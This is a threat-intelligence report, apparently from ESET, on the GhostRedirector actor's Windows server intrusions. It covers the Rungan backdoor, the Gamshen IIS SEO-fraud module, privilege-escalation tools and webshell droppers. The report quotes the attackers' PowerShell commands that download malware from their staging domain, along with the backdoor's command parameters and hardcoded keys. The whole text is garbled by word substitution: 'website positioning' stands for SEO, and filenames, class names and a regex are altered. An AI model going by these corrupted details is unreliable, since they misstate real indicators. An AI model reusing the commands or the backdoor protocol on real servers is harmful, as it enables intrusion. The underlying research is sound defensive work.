ESET researchers have recognized a brand new menace actor, whom now we have named GhostRedirector, that compromised a minimum of 65 Home windows servers primarily in Brazil, Thailand, and Vietnam. GhostRedirector used two beforehand undocumented, customized instruments: a passive C++ backdoor that we named Rungan, and a malicious Web Info Providers (IIS) module that we named Gamshen.<\/p>\n

Whereas Rungan has the aptitude of executing instructions on a compromised server, the aim of Gamshen is to supply website positioning fraud as-a-service, i.e., to control search engine outcomes, boosting the web page rating of a configured goal web site. Though Gamshen solely modifies the response when the request comes from Googlebot \u2013 i.e., it doesn’t serve malicious content material or in any other case have an effect on common guests of the web sites \u2013 participation within the website positioning fraud scheme can damage the compromised host web site fame by associating it with shady website positioning methods and the boosted web sites.<\/p>\n

Apparently, Gamshen is carried out as a local IIS module \u2013 IIS (Web Info Providers) is Microsoft\u2019s Home windows net server software program, which has a modular structure supporting two forms of extensions: native (C++ DLL) and managed (.NET meeting). There are various kinds of malware that may abuse this know-how; our 2021 white paper Anatomy of native IIS malware<\/a> offers a deep perception into the forms of native IIS threats and their structure. Gamshen falls below the class of a trojan with the principle aim of facilitating website positioning fraud, much like IISerpent, which we documented beforehand<\/a>.<\/p>\n

Apart from Rungan and Gamshen, GhostRedirector additionally makes use of a collection of different customized instruments, in addition to the publicly identified exploits EfsPotato<\/a> and BadPotato<\/a>, to create a privileged consumer on the server that can be utilized to obtain and execute different malicious elements with larger privileges, or used as a fallback in case the Rungan backdoor or different malicious instruments are faraway from the compromised server. We consider with medium confidence {that a} China-aligned menace actor was behind these assaults. On this blogpost we offer perception into the GhostRedirector arsenal used to compromise its victims.<\/p>\n

\n
Key factors of this blogpost:<\/strong><\/p>\n
\n
We noticed a minimum of 65 Home windows servers compromised in June 2025.<\/li>\n
Victims are primarily positioned in Brazil, Thailand, and Vietnam.<\/li>\n
Victims should not associated to at least one particular sector however to a spread equivalent to insurance coverage, healthcare, retail, transportation, know-how, and training.<\/li>\n
GhostRedirector has developed a brand new C++ backdoor, Rungan, able to executing instructions on the sufferer\u2019s server.<\/li>\n
GhostRedirector has developed a malicious native IIS module, Gamshen, that may carry out website positioning fraud; we consider its objective is to artificially promote numerous playing web sites.<\/li>\n
GhostRedirector depends on public exploits equivalent to BadPotato or EfsPotato for privilege escalation on compromised servers.<\/li>\n
Based mostly on numerous components, we conclude with medium confidence {that a} beforehand unknown, China-aligned menace actor was behind these assaults. We now have named it GhostRedirector.<\/li>\n<\/ul>\n<\/blockquote>\n
Attribution<\/h2>\n
We haven\u2019t been capable of attribute this assault to any identified group; thus we coined the brand new identify GhostRedirector, to cluster all actions documented on this blogpost. These actions began in December of 2024, however we had been capable of uncover different associated samples that lead us consider that GhostRedirector has been lively since a minimum of August 2024.<\/p>\n
GhostRedirector has an arsenal that features the passive C++ backdoor Rungan, the malicious IIS trojan Gamshen, and quite a lot of different utilities. We now have clustered these instruments collectively by:<\/p>\n
\n
their presence on the identical compromised server throughout the identical timeframe,<\/li>\n
a shared staging server, and<\/li>\n
similarities within the PDB paths of assorted GhostRedirector instruments, as defined under.<\/li>\n<\/ul>\n
We consider with medium confidence that GhostRedirector is a China-aligned menace actor, based mostly on the next components:<\/p>\n
\n
a number of samples of GhostRedirector instruments have hardcoded Chinese language strings,<\/li>\n
a code-signing certificates issued to a Chinese language firm was used within the assault, and<\/li>\n
one of many passwords for GhostRedirector-created customers on the compromised server comprises the phrase huang<\/span>, which is Chinese language for yellow.<\/li>\n<\/ul>\n
GhostRedirector isn’t the primary identified case of a China-aligned menace actor partaking in website positioning fraud by way of malicious IIS modules. Final yr, Cisco Talos revealed a blogpost a few China-aligned menace actor known as DragonRank<\/a> that conducts website positioning fraud. There may be some overlap within the sufferer geolocation (Thailand, India, and the Netherlands) and sectors (healthcare, transportation, and IT) in each assaults. Nonetheless, it’s doubtless that these had been opportunistic assaults, exploiting as many weak servers as attainable, quite than focusing on a selected set of entities. Apart from these similarities, we don\u2019t have any purpose to consider that DragonRank and GhostRedirector are linked, so we observe these actions individually.<\/p>\n
Victimology<\/h2>\n
Determine 1\u00a0reveals a heatmap of the affected nations, combining knowledge from two sources:<\/p>\n
\n
ESET telemetry, the place we detected these assaults between December 2024 and April 2025, and<\/li>\n
our internet-wide scan from June 2025 that we ran to get a greater understanding of the size of the assault, and that allowed us to establish further victims.<\/li>\n<\/ul>\n
We notified all of the victims that we recognized by way of our web scan in regards to the compromise.<\/p>\n
$\"Figure$
Determine 1. International locations the place victims had been detected<\/em><\/figcaption><\/figure>\n
With all of the collected info, we discovered that a minimum of 65 Home windows servers had been compromised worldwide. A lot of the affected servers are in Brazil, Peru, Thailand, Vietnam, and the USA. Observe that many of the compromised servers positioned within the USA seem to have been rented to corporations which might be based mostly in nations from the earlier record. We consider that GhostRedirector was extra all in favour of focusing on victims in South America and South Asia.<\/p>\n
Additionally, we noticed a small variety of instances in:<\/p>\n
\n
Canada,<\/li>\n
Finland,<\/li>\n
India,<\/li>\n
the Netherlands,<\/li>\n
the Philippines, and<\/li>\n
Singapore.<\/li>\n<\/ul>\n
GhostRedirector doesn\u2019t appear to be all in favour of a specific vertical or sector; now we have seen victims in sectors equivalent to training, healthcare, insurance coverage, transportation, know-how, and retail.<\/p>\n
Preliminary entry<\/h2>\n
Based mostly on ESET telemetry, we consider that GhostRedirector positive aspects preliminary entry to its victims by exploiting a vulnerability, in all probability an SQL Injection. Then it makes use of PowerShell to obtain numerous malicious instruments \u2013 all from the identical staging server, 868id[.]com<\/span>. In some instances, now we have seen the attackers leveraging a distinct LOLBin<\/a>, CertUtil, for a similar objective.<\/p>\n
This conjecture is supported by our commentary that the majority unauthorized PowerShell executions originated from the binary sqlserver.exe<\/span>, which holds a saved process xp_cmdshell<\/span> that can be utilized to execute instructions on a machine.<\/p>\n
The next are examples of instructions that we detected being executed on the compromised servers:<\/p>\n
\n
cmd.exe \/d \/s \/c ” powershell curl\u00a0 https:\/\/xzs.868id[.]com\/EfsNetAutoUser_br.exe -OutFile C:ProgramDataEfsNetAutoUser_br.exe”<\/span><\/li>\n
cmd.exe \/d \/s \/c ” powershell curl\u00a0 http:\/\/xz.868id[.]com\/EfsPotato_sign.exe -OutFile C:ProgramDataEfsPotato_sign.exe”<\/span><\/li>\n
cmd.exe \/d \/s \/c “powershell curl\u00a0 https:\/\/xzs.868id[.]com\/hyperlink.exe\u00a0 -OutFile C:ProgramDatalink.exe”<\/span><\/li>\n
powershell\u00a0 curl\u00a0 https:\/\/xzs.868id[.]com\/iis\/br\/ManagedEngine64_v2.dll -OutFile\u00a0 C:ProgramDataMicrosoftDRMlogManagedEngine64.dll<\/span><\/li>\n
powershell\u00a0 curl https:\/\/xzs.868id[.]com\/iis\/IISAgentDLL.dll -OutFile\u00a0 C:ProgramDataMicrosoftDRMlogminiscreen.dll<\/span><\/li>\n<\/ul>\n
We additionally encountered that GhostRedirector put in GoToHTTP<\/a> on the compromised net server, after downloading it from the identical staging server. GoToHTTP is a benign software that permits establishing a distant connection that may be accessed from a browser.<\/p>\n
GhostRedirector used the listing C:ProgramData<\/span> to put in its malware, significantly for the C++ backdoor and the IIS trojan they use the listing C:ProgramDataMicrosoftDRMlog<\/span>.<\/p>\n
Assault overview<\/h2>\n
An outline of the assault is proven in Determine 2. Attackers compromise a Home windows server, obtain and execute numerous malicious instruments: a privilege escalation software, malware that drops a number of webshells, the passive C++ backdoor Rungan, or the IIS trojan Gamshen. The aim of the privilege escalation instruments is to create a privileged consumer within the Directors group, so GhostRedirector can then leverage this account to execute privileged operations, or as a fallback in case the group loses entry to the compromised server.<\/p>\n
\u00a0<\/p>\n
$\"ghostredirector-figure$
Determine 2. Assault overview<\/em><\/figcaption><\/figure>\nPernicious Potatoes performing privilege escalation<\/h2>\n
As a part of its arsenal, GhostRedirector created a number of instruments that leverage the native privilege escalation (LPE<\/a>) tactic, doubtless based mostly on public EfsPotato and BadPotato exploits. Nearly the entire analyzed samples had been obfuscated with .NET Reactor<\/a>, with a number of layers of obfuscation. A number of the samples had been validly signed with a code-signing certificates issued by TrustAsia RSA Code Signing CA G3, to \u6df1\u5733\u5e02\u8fea\u5143\u7d20\u79d1\u6280\u6709\u9650\u516c\u53f8<\/span> (Shenzhen Diyuan Know-how Co., Ltd.), and with a thumbprint of BE2AC4A5156DBD9FFA7A9F053F8FA4AF5885BE3C<\/span>.<\/p>\n
The primary aim of those samples was to create or modify a consumer account on the compromised server and add it to the Directors group.<\/p>\n
Throughout our evaluation, we extracted from the analyzed samples the next usernames that had been used within the creation of those malicious administrator customers.<\/p>\n
\n
MysqlServiceEx<\/span><\/li>\n
MysqlServiceEx2<\/span><\/li>\n
Admin<\/span><\/li>\n<\/ul>\n
Determine 3 reveals the decompiled code utilized by these samples to create a consumer after profitable LPE exploitation. The password has been redacted for safety functions.<\/p>\n
$\"Figure$
Determine 3. Portion of decompiled code that creates a brand new consumer on a sufferer server<\/em><\/figcaption><\/figure>\n
As seen in Determine 3, these privilege escalation instruments use a customized C# class named CUserHelper<\/span>. This class is carried out in a DLL named Widespread.International.DLL<\/span> (SHA-1: 049C343A9DAAF3A93756562ED73375082192F5A8<\/span>), which we named Comdai and that was embedded within the analyzed samples. We consider that Comdai was created by the identical builders as the remainder of the GhostRedirector arsenal, based mostly on the shared sample of their respective PDB paths \u2013 see the repeated x5<\/span> substring as proven in Desk 1, which is shared between Rungan, Gamshen, and the privilege escalation instruments.<\/p>\n
Desk 1. PDB strings collected from GhostRedirector instruments<\/em><\/p>\n\n\n\n\n\n\n\n\n
Pattern SHA1<\/strong><\/td>\n Pattern sort<\/strong><\/td>\n PDBs<\/strong><\/td>\n<\/tr>\n<\/thead>\n
049C343A9DAAF3A93756562ED73375082192F5A8<\/span><\/td>\n Comdai library<\/td>\n F:x5netToolsoMainCommon.InternationalobjReleaseCommon.International.pdb<\/span><\/td>\n<\/tr>\n
28140A5A29EBA098BC6215DDAC8E56EACBB29B69<\/span><\/td>\n Rungan, C++ backdoor<\/td>\n F:x5AvoidRandomKill-mainx64ReleaseIISAgentDLL.pdb<\/span><\/td>\n<\/tr>\n
871A4DF66A8BAC3E640B2D1C0AFC075BB3761954<\/span><\/td>\n Gamshen, IIS trojan<\/td>\n F:x5AvoidRandomKill-mainReleaseManagedEngine64.pdb<\/span><\/td>\n<\/tr>\n
371818BDC20669DF3CA44BE758200872D583A3B8<\/span><\/td>\n Software to create a brand new consumer<\/td>\n E:x5netToolsWinSystemobjReleaseuedit32_sign.pdb<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Desk 2 offers an summary of the necessary courses carried out in Comdai which might be utilized by GhostRedirector\u2019s numerous privilege escalation instruments, together with the outline of the category habits. Observe the ExeHelper<\/span> class, which offers a perform to execute a file named hyperlink.exe<\/span> \u2013 GhostRedirector used the identical filename to deploy the GoToHTTP software.<\/p>\n
Additionally be aware the backdoor-like capabilities, together with community communication, file execution, listing itemizing, and manipulating providers and Home windows registry keys. Whereas we haven\u2019t noticed these strategies being utilized by any identified GhostRedirector elements, this reveals that Comdai is a flexible software that may assist numerous levels of the assault.<\/p>\n
Desk 2. Courses carried out in Comdai<\/em><\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
C# class<\/strong><\/td>\n Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n
AES<\/span><\/td>\n Encrypts\/Decrypts AES in ECB mode.
Key: 030201090405060708091011121315<\/span><\/td>\n<\/tr>\n
CUserHelper<\/span><\/td>\n Lists customers on a compromised server.
Creates a consumer with specified credentials and provides it into a bunch identify additionally specified by an argument; by default it makes use of the Directors group.<\/td>\n<\/tr>\n
ExeHelper<\/span><\/td>\n Used to execute a binary named hyperlink.exe<\/span>. This identify was utilized by the attackers for the GoToHTTP binary.<\/td>\n<\/tr>\n
HttpHelper<\/span><\/td>\n Can carry out by way of totally different strategies, GET and POST requests, with an unknown objective, to a hardcoded URL \u2013 https:\/\/www.cs01[.]store<\/span>.<\/td>\n<\/tr>\n
MsgData<\/span><\/td>\n Incorporates solely attributes, utilized by the category NodejsTX<\/span> to deserialize a JSON object.<\/td>\n<\/tr>\n
MyDll<\/span><\/td>\n Invokes strategies from an unknown DLL named MyDLL.dll<\/span>.<\/td>\n<\/tr>\n
NodejsTX<\/span><\/td>\n Gives a way to speak with one other malicious part by way of pipes; the pipe is known as salamander_pipe<\/span>, which might obtain parameters to create a specified consumer who’s then added to the directors group. This consumer creation is achieved by invoking a way from the CUserHelper<\/span> class.<\/td>\n<\/tr>\n
RegeditHelper<\/span><\/td>\n Incorporates a way for studying the worth of a specified home windows registry key.<\/td>\n<\/tr>\n
ScanfDirectory<\/span><\/td>\n Incorporates strategies for itemizing the contents of a specified listing.<\/td>\n<\/tr>\n
ServiceHelper<\/span><\/td>\n Incorporates strategies to restart a specified service.<\/td>\n<\/tr>\n
SystemHelper<\/span><\/td>\n Incorporates strategies to execute a binary or execute instructions by way of ProcessStartInfo<\/a> class. The binary or instructions are offered to ProcessStartInfo<\/a> as arguments.<\/td>\n<\/tr>\n
UserStruct<\/span><\/td>\n Incorporates solely attributes, username \u2013 string
Teams \u2013 record
Attributes are utilized by class CUserHelper<\/span> for itemizing customers.<\/string><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Some exceptions to the rule<\/h3>\n
We found a pattern (SHA-1: 21E877AB2430B72E3DB12881D878F78E0989BB7F<\/span>) utilizing the identical certificates, uploaded to VirusTotal in August 2024, which we consider is said to GhostRedirector\u2019s arsenal, though we didn\u2019t see it used throughout this marketing campaign. This assumption is predicated on the habits of the pattern, which tries to open a textual content file and ship its contents to a hardcoded URL. For this, the pattern comprises an embedded Comdai DLL and it invokes the Comdai C# class HttpHelper<\/span>, which has a hardcoded URL that’s https:\/\/www.cs01[.]store<\/span> \u2013 the identical area talked about in Desk 2.<\/p>\n
We additionally found some privilege escalation instruments that differ a bit from the habits talked about beforehand.<\/p>\n
For instance, in a single case (SHA-1: 5A01981D3F31AF47614E51E6C216BED70D921D60<\/span>), as an alternative of making a brand new consumer, it modifications the password of an present consumer Visitor<\/span> for one hardcoded within the malware after which, utilizing the RID hijacking<\/a> approach, it makes an attempt so as to add this consumer to the administrator teams.<\/p>\n
In one other case (SHA-1: 9DD282184DDFA796204C1D90A46CAA117F46C8E1<\/span>), the software not solely creates a brand new administrator consumer but additionally installs a number of webshells on a selected path within the sufferer\u2019s servers, offered manually by GhostRedirector as an argument to the software.<\/p>\n
These webshells are embedded within the sources of the pattern in cleartext, and the names are hardcoded; the names we noticed used are:<\/p>\n
\n
C1.php<\/span><\/li>\n
Cmd.aspx<\/span><\/li>\n
Error.aspx<\/span><\/li>\n
K32.asxp<\/span><\/li>\n
K64.aspx<\/span><\/li>\n
LandGrey.asp<\/span><\/li>\n<\/ul>\n
Zunput, a web site info collector plus webshell dropper<\/h2>\n
One other fascinating software utilized by GhostRedirector had the filename SitePuts.exe<\/span>. This pattern (SHA\u20111: EE22BA5453ED577F8664CA390EB311D067E47786<\/span>), which we named Zunput, can be developed with the .NET Framework and signed with the certificates talked about above; it reads the IIS configuration system searching for configured web sites and obtains the next details about them:<\/p>\n
\n
bodily path on the server,<\/li>\n
identify, and<\/li>\n
for every web site, the next attributes:\n
\u25cb<\/span> protocol<\/p>\n
\u25cb<\/span> IP handle, and<\/p>\n
\u25cb <\/span>hostname<\/p>\n<\/li>\n<\/ul>\n
As soon as the data is collected, Zunput checks for the existence of the bodily path on the server, and in addition verifies that the listing comprises a minimum of one file with the .php<\/span>, .aspx<\/span>, or .asp<\/span> extension. This manner, Zunput solely targets lively web sites able to executing dynamic content material \u2013 solely in these directories does it then drop the embedded webshells. Webshells are embedded within the sources of the pattern and for the dates of every webshell (creation, modified, accessed), the malware makes use of the date of an present file from the listing.<\/p>\n
Webshells are written in ASP, PHP, and JavaScript, and the names used are chosen randomly from the next record:<\/p>\n
\n
Xml<\/span><\/li>\n
Ajax<\/span><\/li>\n
Sync<\/span><\/li>\n
Loadapi<\/span><\/li>\n
Loadhelp<\/span><\/li>\n
Code<\/span><\/li>\n
Jsload<\/span><\/li>\n
Loadcss<\/span><\/li>\n
Loadjs<\/span><\/li>\n
Pop3<\/span><\/li>\n
Imap<\/span><\/li>\n
Api<\/span><\/li>\n<\/ul>\n
Extensions used for the webshells:<\/p>\n
Info collected throughout Zunput execution is saved in a file named log.txt<\/span> (see an instance in Determine 4) within the listing from which it was executed. This info isn\u2019t exfiltrated routinely by Zunput, however it may be obtained by the attackers by way of a number of strategies; one will be by way of the deployed webshell talked about earlier than.<\/p>\n
$\"Figure$
Determine 4. Instance of saved content material of <\/em>log.txt<\/span> the place <\/em>\u5206\u5272\u7ebf<\/span> machine interprets to Dividing line<\/em><\/figcaption><\/figure>\n
The ultimate payloads<\/h2>\n
Rungan, a passive C++ backdoor<\/h3>\n
Rungan (SHA-1: 28140A5A29EBA098BC6215DDAC8E56EACBB29B69<\/span>) is a passive C\/C++ backdoor that now we have seen put in in C:ProgramDataMicrosoftDRMlogminiscreen.dll<\/span>.<\/p>\n
This backdoor makes use of AES in CBC mode for string decryption. 030201090405060708090A0B0C0D0E0F<\/span>\u00a0is used for the IV and key, and based mostly on the malware\u2019s PDB path F:x5AvoidRandomKill-mainx64ReleaseIISAgentDLL.pdb<\/span>, we consider that GhostRedirector reuses the AES implementation from the AvoidRandomKill repository<\/a>.<\/p>\n
The primary performance of this backdoor is to register a plaintext hardcoded URL http:\/\/+:80\/v1.0\/8888\/sys.html<\/span> into the compromised server, bypassing IIS by abusing the HTTP Server API<\/a>. Then the backdoor waits for a request that matches that URL, then parses and executes the acquired instructions on the compromised server.<\/p>\n
Further URLs will be set in an optionally available configuration file named C:WindowsMicrosoft.NETFramework64v2.0.507271033vbskui.dll<\/span>. Rungan will take heed to all incoming requests matching the configured patterns, and the configuration will be up to date by way of a backdoor command. To activate the backdoor, any incoming HTTP request should comprise a selected mixture of parameters and values, that are hardcoded in Rungan.<\/p>\n
As soon as this examine is met, Rungan makes use of the parameter motion<\/span> to find out the backdoor command, and makes use of the information within the HTTP request physique because the command parameters. No encryption or encoding is used within the C&C protocol. Essentially the most notable capabilities are creating a brand new consumer or executing instructions on the sufferer\u2019s server; a full record of backdoor instructions is proven in Desk 3.<\/p>\n
Desk 3.Rungan backdoors instructions<\/em><\/p>\n\n\n\n\n\n\n\n\n
Parameter<\/strong><\/td>\n Physique<\/strong><\/td>\n Description<\/strong><\/td>\n Response<\/strong><\/td>\n<\/tr>\n<\/thead>\n
mkuser<\/span><\/td>\n consumer=&pwd=&groupname=<\/password><\/username><\/span><\/td>\n Creates the desired consumer on the compromised server utilizing the NetUserAdd<\/a> Home windows API.<\/td>\n Standing code of the operation.<\/td>\n<\/tr>\n
listfolder<\/span><\/td>\n path=<\/span><\/td>\n This seems unfinished: it collects info from chosen path however doesn\u2019t exfiltrate it.<\/td>\n N\/A<\/td>\n<\/tr>\n
addurl<\/span><\/td>\n url=|<\/url_1><\/span><\/td>\n Registers URLs the backdoor will hear on. Could be multiple separated with |<\/span>. The URL can be added to the configuration file.<\/td>\n If a URL fails to register, the response will probably be Failed: <\/span>, in any other case All Okay<\/span>.<\/td>\n<\/tr>\n
cmd<\/span><\/td>\n cmdpath=&mingl=<\/cmd_path><\/span><\/td>\n Executes a command on the sufferer\u2019s server utilizing pipes and the CreatePorcessA<\/a> API.<\/td>\n Command output.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Determine 5 and Determine 6 present totally different examples of requests made to the malware throughout a dynamic evaluation utilizing the software postman<\/a> in a simulated setting.<\/p>\n
$\"Figure$
Determine 5. Executing instructions on a testing server<\/em><\/figcaption><\/figure>\n $\"Figure$
Determine 6. Including a consumer by way of the malware on a testing server<\/em><\/figcaption><\/figure>\nGamshen, malicious IIS module<\/h3>\n
Developed as a C\/C++ DLL, Gamshen is a malicious native IIS module. The primary performance of this malware is to intercept requests made to the compromised server from the Googlebot search engine crawler and solely in that case modify the professional response of the server. The response is modified based mostly on knowledge requested dynamically from Gamshen\u2019s C&C server. By doing this, GhostRedirector makes an attempt to control the Google search rating of a selected, third-party web site, through the use of manipulative, shady website positioning methods equivalent to creating synthetic backlinks from the professional, compromised web site to the goal web site. We beforehand documented a case of an IIS trojan utilizing comparable ways: see IISerpent: Malware-driven website positioning fraud as a service<\/a>.<\/p>\n
It is necessary to say {that a} common consumer who visits the affected web site wouldn\u2019t see any modifications and wouldn’t be affected by the malicious habits as a result of Gamshen doesn\u2019t set off any of its malicious exercise on requests from common guests.<\/p>\n
Determine 7 reveals how a malicious module taking part within the IIS website positioning fraud scheme modifies the professional response of a compromised server when a request is comprised of the Google Crawler, aka Googlebot.<\/p>\n
$\"Figure$
Determine 7. Overview of an website positioning fraud scheme<\/em><\/figcaption><\/figure>\n
So as to do that, the attackers have carried out their very own malicious code for the next IIS occasion handlers:<\/p>\n
\n
OnBeginRequest<\/span><\/li>\n
OnPreExecuteRequestHandler<\/span><\/li>\n
OnPostExecuteRequestHandler<\/span><\/li>\n
OnSendResponse<\/span><\/li>\n<\/ul>\n
When the compromised server receives an HTTP request, the request goes by way of the IIS request processing pipeline, which triggers these handlers in numerous steps of the method \u2013 notably, the OnSendResponse<\/span> handler is triggered simply earlier than the HTTP response is distributed out by the compromised server. Since Gamshen is put in as an IIS module, it routinely intercepts every incoming HTTP request at these steps, and performs three actions.<\/p>\n
First, it performs a collection of validations to filter solely HTTP requests of curiosity:<\/p>\n
\n
The request should originate from a Google crawler: both the Consumer-Agent<\/span> header comprises the string Googlebot<\/span>, or the Referer<\/span> comprises the string google.com<\/span>.<\/li>\n
The HTTP methodology should not be POST<\/span>.<\/li>\n
The requested useful resource isn’t a picture, stylesheet, or comparable static useful resource, i.e., it doesn\u2019t have any of the next extensions: .jpg<\/span>, .resx<\/span>, .png<\/span>, .jpeg<\/span>, .bmp<\/span>, .gif<\/span>, .ico<\/span>, .css<\/span>, or .js<\/span>. That is more likely to keep away from breaking UI performance.<\/li>\n
The URL should comprise the string android_<\/span> or match any of the next common expressions:\n
\u25cb<\/span> [\/]?(android|performs|articles|particulars|iosapp|topnews|joga)_([0-9_]{6,20})(\/|.w+)?<\/span><\/p>\n
\u25cb<\/span> [\/]?(android|performs|articles|particulars|iosapp|topnews|joga)_([a-zA-Z0-9_]{6,8})\/([a-zA-Z0-9_]{6,20})(\/|.w+)?<\/span><\/p>\n
\u25cb<\/span> [\/]?(android|performs|articles|particulars|iosapp|topnews|joga)\/([0-9_]{6,20})(\/|.w+)?<\/span><\/p>\n
\u25cb<\/span> [\/]?(android|performs|articles|particulars|iosapp|topnews|joga)\/([a-zA-Z]{8,10})(\/|.w+)?<\/span><\/p>\n
\u25cb<\/span> [\/]?([a-zA-Z0-9]{6,8})\/([a-zA-Z0-9]{6,8})(\/|.phtml|.xhtml|.phtm|.shtml)<\/span><\/p>\n
\u25cb<\/span> [\/]?([a-zA-Z0-9_]{14})(\/|.html|.htm)<\/span><\/p>\n
\u25cb<\/span> [\/]?([a-zA-Z0-9]{6})\/([a-zA-Z0-9]{8})(\/|.html|.htm)<\/span><\/p>\n
\u25cb<\/span> [\/]?([a-z0-9]{6}).xhtml<\/span><\/p>\n<\/li>\n<\/ul>\n
Second, Gamshen modifies the response meant for the search engine crawler with knowledge obtained from its personal C&C server, brproxy.868id[.]com<\/span>. We now have noticed three URLs getting used for this objective:<\/p>\n
\n
https:\/\/brproxy.868id[.]com\/index_base64.php?<\/span><\/li>\n
https:\/\/brproxy.868id[.]com\/tz_base64.php?<\/span><\/li>\n
https:\/\/brproxy.868id[.]com\/url\/index_base64.php<\/span><\/li>\n<\/ul>\n
In all instances, the next hardcoded Consumer-Agent<\/span> string is used: Mozilla\/5.0 (appropriate; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html<\/span>). A base64-encoded response is anticipated, which is then decoded and injected into the HTTP response meant for the search engine crawler.<\/p>\n
Lastly, on the final step of the request processing pipeline, simply earlier than the HTTP response is distributed out \u2013 the OnSendResponse<\/span> occasion handler verifies the response for these crawler requests. If the response has the 404<\/span> HTTP standing code \u2013 i.e., Gamshen had not been capable of acquire the malicious knowledge from its C&C server, then it as an alternative performs a redirect to a distinct C&C server: http:\/\/gobr.868id[.]com\/tz.php<\/span>.<\/p>\n
We weren\u2019t capable of acquire a response from brproxy.868id[.]com<\/span> or gobr.868id[.]com<\/span>, however consider the information helps shady website positioning methods<\/a> \u2013 equivalent to key phrase stuffing, inserting malicious backlinks \u2013 or, in case of the redirection, making the search engine affiliate the compromised web site with the goal, third-party web site, thus poisoning the search index.<\/p>\n
We had been, nonetheless, capable of pivot on these domains on VirusTotal and discover associated pictures \u2013 on this case, pictures promoting a playing utility for Portuguese talking customers. We consider this web site is the beneficiary of the website positioning fraud scheme, facilitated by this malicious IIS module \u2013 Gamshen in all probability makes an attempt to compromise as many web sites as attainable and misuse their fame to drive site visitors to this third-party web site.<\/p>\n
Determine 8 and Determine 9 present two pictures probably utilized by GhostRedirector in its website positioning fraud scheme.<\/p>\n
$\"Figure$
Determine 8. A playing web site doubtless benefiting from the website positioning fraud scheme (machine translation: Advantages and privileges for VIP members)<\/em><\/figcaption><\/figure>\n $\"Figure$
Determine 9. A playing web site doubtless benefiting from the website positioning fraud scheme (machine translation: Massive deposits and withdrawals with out worries)<\/em><\/figcaption><\/figure>\nConclusion<\/h2>\n
On this blogpost, now we have introduced a beforehand unknown, China-aligned menace actor, GhostRedirector, and its toolkit for compromising and abusing Home windows servers. Along with enabling distant command execution on the compromised servers, GhostRedirector additionally deploys a malicious IIS module, Gamshen, designed to control Google search outcomes by way of shady website positioning ways. Gamshen abuses the credibility of the web sites hosted on the compromised server to advertise a third-party, playing web site \u2013 probably a paying consumer taking part in an website positioning fraud as-a-service scheme.<\/p>\n
GhostRedirector additionally demonstrates persistence and operational resilience by deploying a number of distant entry instruments on the compromised server, on prime of making rogue consumer accounts, all to take care of long-term entry to the compromised infrastructure.<\/p>\n
\n
Mitigation suggestions will be present in our complete white paper<\/a>. For any inquiries, or to make pattern submissions associated to the topic, contact us at threatintel@eset.com<\/a>.<\/em><\/p>\n<\/blockquote>\n
IoCs<\/h2>\n
A complete record of indicators of compromise (IoCs) and samples will be present in our GitHub repository<\/a>.<\/p>\n
Recordsdata<\/h3>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SHA-1<\/strong><\/td>\n Filename<\/strong><\/td>\n Detection<\/strong><\/td>\n Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n
EE22BA5453ED577F8664CA390EB311D067E47786<\/span><\/td>\n SitePut.exe<\/span><\/td>\n MSIL\/Agent.FEZ<\/td>\n Zunput, info collector and webshell installer.<\/td>\n<\/tr>\n
677B3F9D780BE184528DE5967936693584D9769A<\/span><\/td>\n EfsNetAutoUser.exe<\/span><\/td>\n MSIL\/HackTool.Agent.QJ<\/td>\n A customized software utilizing the EfsPotato exploit to create a brand new consumer on the compromised server.<\/td>\n<\/tr>\n
5D4D7C96A9E302053BDFAF2449F9A2AB3C806E63<\/span><\/td>\n NetAutoUser.exe<\/span><\/td>\n MSIL\/AddUser.S<\/td>\n A customized software utilizing the BadPotato exploit to create a brand new consumer on the compromised server.<\/td>\n<\/tr>\n
28140A5A29EBA098BC6215DDAC8E56EACBB29B69<\/span><\/td>\n miniscreen.dll<\/span><\/td>\n Win64\/Agent.ELA<\/td>\n Rungan, a passive C++ backdoor.<\/td>\n<\/tr>\n
371818BDC20669DF3CA44BE758200872D583A3B8<\/span><\/td>\n auto.exe<\/span><\/td>\n Generik.KJWBIPC<\/td>\n A software to create a brand new consumer on the compromised server.<\/td>\n<\/tr>\n
9DD282184DDFA796204C1D90A46CAA117F46C8E1<\/span><\/td>\n auto_sign.exe<\/span><\/td>\n MSIL\/Agent.XQL<\/td>\n A software to create a brand new consumer or deploy webshells on the compromised server.<\/td>\n<\/tr>\n
87F354EAA1A6ED5AE51C4B1A1A801B6CF818DAFC<\/span><\/td>\n EfsNetAutoUser.exe<\/span><\/td>\n MSIL\/HackTool.Agent.QJ<\/td>\n A customized software utilizing the EfsPotato exploit to create a brand new consumer on the compromised server.<\/td>\n<\/tr>\n
5A01981D3F31AF47614E51E6C216BED70D921D60<\/span><\/td>\n DotNet4.5.exe<\/span><\/td>\n MSIL\/AddUser.S<\/td>\n Customized software utilizing BadPotato exploit to raise privileges of an present consumer.<\/td>\n<\/tr>\n
6EBD7498FC3B744CED371C379BA537077DD97036<\/span><\/td>\n NetAUtoUser_sign.exe<\/span><\/td>\n MSIL\/AddUser.S<\/td>\n Customized software utilizing BadPotato exploit to elevated privileges of an present consumer.<\/td>\n<\/tr>\n
0EE926E29874324E52DE816B74B12069529BB556<\/span><\/td>\n hyperlink.exe<\/span><\/td>\n Win64\/RemoteAdmin.GotoHTTP. A probably unsafe utility<\/td>\n GoToHTTP software.<\/td>\n<\/tr>\n
373BD3CED51E19E88876B80225ECA65A5C01413F<\/span><\/td>\n N\/A<\/td>\n PHP\/Webshell.NWE<\/td>\n Webshell.<\/td>\n<\/tr>\n
5CFFC4B3B96256A45FB45056AE0A9DC76329C25A<\/span><\/td>\n N\/A<\/td>\n ASP\/Webshell.MP<\/td>\n Webshell.<\/td>\n<\/tr>\n
B017CEE02D74C92B2C65517101DC72AFA7D18F16<\/span><\/td>\n N\/A<\/td>\n PHP\/Webshell.OHB<\/td>\n Webshell.<\/td>\n<\/tr>\n
A8EE056799BFEB709C08D0E41D9511CED5B1F19D<\/span><\/td>\n N\/A<\/td>\n ASP\/Webshell.UV<\/td>\n Webshell.<\/td>\n<\/tr>\n
